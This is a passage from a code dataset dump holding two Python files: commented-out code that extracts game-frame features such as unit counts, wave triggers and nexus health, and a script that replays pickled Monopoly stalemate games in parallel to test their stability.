when we toggle on the unit additions , which was 10 past the DP\n# delta_key_counters[delta_counter_key] = 0\n# #console.log(key + \" frame \" + frameIndex + \" resetting to 0\")\n# frame[delta_key + \"_triggered\"] = 0\n# else:\n# delta_key_counters[delta_counter_key] = cur_count\n# frame[delta_key] = prev_frame[delta_key]\n# frame[delta_key + \"_triggered\"] = 1\n# # console.log(key + \" frame \" + frameIndex + \" applying prior delta\")\n# prev_frame = frame\n\n# def add_wave_triggered_to_frames(frame_infos):\n# key = \"wave_triggered\"\n# count = -1\n# for i in range(len(frame_infos) -1):\n# cur_frame = frame_infos[i]\n# next_frame = frame_infos[i+1]\n# cur_units = cur_frame[\"units\"]\n# next_units = next_frame[\"units\"]\n# 
cur_frame_wave_number = -1\n# next_frame_wave_number = -1\n# for cur_unit in cur_units:\n# if cur_unit[\"unit_type\"] == 45:\n# if cur_unit[\"shield\"] == 42:\n# cur_frame_wave_number = cur_unit[\"health\"] - 1 #first wave is 0\n# for next_unit in next_units:\n# if next_unit[\"unit_type\"] == 45:\n# if next_unit[\"shield\"] == 42:\n# next_frame_wave_number = next_unit[\"health\"] - 1 #first wave is 0\n# if next_frame_wave_number > cur_frame_wave_number:\n# next_frame[key] = 1\n# print(\"wave_triggered added to frame \" + str(i))\n# count = 0\n# elif count != -1 and count <= 40:\n# print(\"wave_triggered added to frame \" + str(i))\n# next_frame[key] = 1\n# count += 1\n# else:\n# next_frame[key] = 0\n\n\n# def extract_unit_values(frame_info, activity):\n# fi = frame_info\n# if is_frame_far_enough_past_dp(fi):\n# for unit_info_key in unit_info_keys:\n# if fi[unit_info_key + \"_delta_triggered\"] == 1:\n# if \"friendly\" in unit_info_key:\n# activity[unit_info_key + \"_delta\"] = fi[unit_info_key + \"_delta\"]\n# activity[unit_info_key + \"_count\"] = fi[unit_info_key + \"_count\"] - fi[unit_info_key + \"_delta\"]\n# activity[\"p1_mineral\"] = get_current_friendly_mineral_health(frame_info)\n# else:\n# if frame_info['wave_triggered'] == 1:\n# activity[unit_info_key + \"_count\"] = fi[unit_info_key + \"_count\"]\n# #activity[\"p1_mineral\"] = get_current_friendly_mineral_health(frame_info)\n# else:\n# if \"friendly\" in unit_info_key:\n# activity[unit_info_key + \"_delta\"] = \"\" #NA\n# activity[unit_info_key + \"_count\"] = fi[unit_info_key + \"_count\"]\n# activity[\"p1_mineral\"] = get_current_friendly_mineral_health(frame_info)\n# else:\n# activity[unit_info_key + \"_count\"] = (fi[unit_info_key + \"_count\"])\n# #activity[\"p1_mineral\"] = get_current_friendly_mineral_health(frame_info)\n\n \n# nexus_units = get_nexus_units(frame_info)\n# activity[\"friendly.nexusHealth.top\"] = get_nexus_health_for_unit(1,\"top\",nexus_units)\n# activity[\"friendly.nexusHealth.bottom\"] = get_nexus_health_for_unit(1,\"bottom\",nexus_units)\n# activity[\"enemy.nexusHealth.top\"] = get_nexus_health_for_unit(4,\"top\",nexus_units)\n# activity[\"enemy.nexusHealth.bottom\"] = get_nexus_health_for_unit(4,\"bottom\",nexus_units)\n\n\n\n# def get_nexus_health_for_unit(alliance, lane, nexusUnits):\n# for unit in nexusUnits:\n# cur_lane = get_unit_lane(unit.y)\n# cur_alliance = unit.alliance\n# if alliance == cur_alliance and cur_lane == lane:\n# return unit.health\n# return 0\n\n# def set_dp_frames(frame_infos):\n# for fi in frame_infos:\n# if fi[\"frame_info_type\"] == \"decision_point\":\n# dp_frames.append(fi)\n\n\n# def is_frame_far_enough_past_dp(frame_info):\n# fi = frame_info\n# frame_number = fi.frame_number\n# far_enough_past_dp = 10\n# for i in range(len(dp_frames)):\n# dp_frame= dp_frames[i]\n# if i == len(dp_frames) - 1:\n# next_dp_frame = None\n# else:\n# next_dp_frame = dp_frames[i + 1]\n# window_start = dp_frame + far_enough_past_dp\n# if (next_dp_frame == None):\n# window_end = window_start + 75\n# else :\n# window_end = next_dp_frame\n# if frame_number >= window_start and frame_number <= window_end:\n# #console.log(\"frame \" + frameNumber + \" is between \"+ windowStart + \" and \" + windowEnd);\n# return True\n# return False\n\n\n# def get_current_friendly_mineral_health(frameInfo):\n# recorder_unit_id = 45\n# for unit in frameInfo.units:\n# if unit.unit_type == recorder_unit_id:\n# recorder_unit = unit\n# mineral_health_sheild_value = 4\n# if recorder_unit.shield == 
mineral_health_sheild_value:\n# current_friendly_mineral_health = recorder_unit.health - 1\n# return current_friendly_mineral_health\n\n","sub_path":"py/activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":29884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"300005771","text":"# Tests the stability of stalemates.\nimport pickle\nfrom monopoly import *\nfrom multiprocessing import *\nimport csv\nfrom copy import deepcopy\n\ndef play_set(sample_size, game, results_q):\n game_winners = []\n\n for i in range(sample_size):\n game_to_play = deepcopy(game)\n\n # Add 10000 more turns.\n game_to_play.cutoff = 20000\n\n # Reset money.\n for player in game_to_play.active_players:\n player.money = 1500\n\n # Play the game.\n results = game_to_play.play()\n game_winners.append(results['winner'])\n\n results_q.put(game_winners)\n\n\ndef main():\n with open('results/stalemateStability_players.csv', 'w', newline='') as csvfile:\n output_file = csv.writer(csvfile, quotechar=',')\n total_sample_size = 1000\n for game_id in [21,49,18]:\n # Load in game data.\n game = pickle.load(open('results/stalemates/long/game' + str(game_id) + '.pickle', \"rb\"))\n\n procs = 4\n results_q = Queue() # Queue for results.\n proc_list = [] # List of processes.\n for i in range(procs):\n proc_list.append(Process(target=play_set, args=(int(total_sample_size / procs), game, results_q)))\n\n for proc in proc_list: # Start all processes.\n proc.start()\n\n for proc in proc_list: # Wait for all processes to finish.\n proc.join()\n\n results_list = []\n\n # Gather the results from each process.\n while not results_q.empty():\n results_list.extend(results_q.get())\n\n results = [game_id, results_list.count(0),results_list.count(1),results_list.count(2)]\n print(results)\n output_file.writerow(results)\n\n '''results.append(12-new_game.hotels)\n new_game.cutoff = 20000\n results = new_game.play()\n\n # Pickle it...like a cucumber!\n pickle.dump(new_game, open('results/stalemates/long/continued/game' + str(i) + '.pickle', 'wb'))\n\n for i in range(13):\n print(i,results.count(i))'''\n\n\nif __name__ == '__main__':\n main()","sub_path":"continueStalemates.py","file_name":"continueStalemates.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}